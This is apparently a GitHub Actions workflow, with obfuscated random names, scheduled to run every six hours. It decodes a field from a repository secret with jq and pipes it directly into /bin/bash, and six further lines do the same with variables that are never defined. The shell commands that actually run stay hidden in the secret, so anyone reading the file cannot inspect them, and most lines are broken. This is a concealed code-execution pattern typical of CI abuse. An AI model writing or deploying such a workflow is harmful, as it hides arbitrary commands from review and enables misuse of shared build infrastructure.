name: juiceqinzq
on:
  workflow_dispatch:
  schedule:
    - cron: '43 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: juiceqinzq
        env:
          iax75599: ${{ secrets.iax75599 }}
        run: |
          echo $iax75599 | jq -r .qeh913 | /bin/bash
          echo $k5 | jq -r .dicmk3080 | /bin/bash
          echo $nnkl5 | jq -r .jeoex63 | /bin/bash
          echo $snov33 | jq -r .bi80 | /bin/bash
          echo $uzlid8037 | jq -r .nyox1 | /bin/bash
          echo $gyyd3924 | jq -r .jq28885 | /bin/bash
          echo $et87 | jq -r .jz63 | /bin/bash

